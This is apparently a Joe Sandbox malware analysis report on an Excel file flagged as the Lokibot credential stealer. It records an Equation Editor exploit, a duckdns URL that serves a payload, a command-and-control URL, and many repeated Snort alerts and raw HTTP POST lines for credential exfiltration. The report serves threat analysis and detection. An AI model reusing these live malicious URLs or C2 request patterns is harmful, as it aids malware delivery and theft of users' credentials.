
Analysis Report 20200413_140639.xlsx

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 222987
Start date: 16.04.2020
Start time: 10:40:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 54s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 20200413_140639.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@5/7@82/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 44.3% (good quality ratio 42.4%)
  • Quality average: 76.6%
  • Quality standard deviation: 29%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | (not extracted) | false | Lokibot | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false | (chart not extracted)

Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Mitre Att&ck Matrix

Each tactic column of the matrix is listed below, top to bottom, as it appears in the original matrix; a number following a technique name is carried over from that matrix cell unchanged.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service
Execution: Execution through API 1; Exploitation for Client Execution 13; Graphical User Interface 1; Scheduled Task; Command-Line Interface; Graphical User Interface; Scripting; Third-party Software
Persistence: Winlogon Helper DLL; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception; Logon Scripts
Privilege Escalation: Access Token Manipulation 1; Process Injection 12; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task; Process Injection
Defense Evasion: Disabling Security Tools 1; Software Packing 2; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 21; Masquerading 1; Virtualization/Sandbox Evasion 1; Access Token Manipulation 1; Process Injection 12
Credential Access: Credential Dumping 2; Credentials in Registry 2; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History
Discovery: System Time Discovery 2; Security Software Discovery 141; File and Directory Discovery 2; System Information Discovery 34; Virtualization/Sandbox Evasion 1; Process Discovery 1; Remote System Discovery 1; Network Service Scanning
Lateral Movement: Remote File Copy 15; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol
Collection: Man in the Browser 1; Data from Local System 2; Email Collection 1; Clipboard Data 1; Data Staged; Screen Capture; Email Collection; Clipboard Data
Exfiltration: Data Encrypted 1; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol
Command and Control: Remote File Copy 15; Standard Cryptographic Protocol 1; Standard Non-Application Layer Protocol 4; Standard Application Layer Protocol 124; Standard Cryptographic Protocol; Commonly Used Port; Uncommonly Used Port; Standard Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://russchine2wsdyspecial6plumbingjkmaterial.duckdns.org/russdoc/regasm.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: vbc.exe.2328.4.memstr | Malware Configuration Extractor: Lokibot {"c2:": "http://toyo-at-jp.info/ig1/fre.php"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BR42M2GZ\regasm[1].exe | Virustotal: Detection: 23%
Source: C:\Users\user\AppData\Roaming\vbc.exe | Virustotal: Detection: 23%
Multi AV Scanner detection for submitted file
Source: 20200413_140639.xlsx | Virustotal: Detection: 25%
Source: 20200413_140639.xlsx | ReversingLabs: Detection: 26%

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\vbc.exe
Office Equation Editor has been started
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
Source: C:\Users\user\AppData\Roaming\vbc.exe | Code function: 4_2_004AB84C __getdrive,FindFirstFileExW,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,GetLastError,FindClose,GetLastError,FindClose,4_2_004AB84C

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 103.114.106.209:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 103.114.106.209:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic. Every alert below was raised on a connection from 192.168.2.2 to 89.208.229.230:80; the 56 connections differ only in their source port, and every source port in a group triggered each of the four rules listed for that group.
Source ports 49161 - 49162 (2 connections):
  • Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
  • Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno)
  • Snort IDS: 2025381 ET TROJAN LokiBot Checkin
  • Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
Source ports 49163 - 49216 (54 connections):
  • Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1
  • Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno)
  • Snort IDS: 2025381 ET TROJAN LokiBot Checkin
  • Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49217 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49218 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49219 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49220 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49221 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49222 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49223 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49224 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49225 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49226 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49227 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49228 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49229 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49230 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49231 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49232 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49233 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49234 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49235 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49236 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49237 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49238 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49239 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49240 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49241 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49241 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49241 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49241 -> 89.208.229.230:80
Uses dynamic DNS services
Source: unknown | DNS query: name: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 16 Apr 2020 08:43:02 GMT | Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | Last-Modified: Wed, 15 Apr 2020 21:57:30 GMT | ETag: "130600-5a35b671d1753" | Accept-Ranges: bytes | Content-Length: 1246720 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /russdoc/regasm.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /ig1/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: toyo-at-jp.info | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 4AAE78FA | Content-Length: 174 | Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
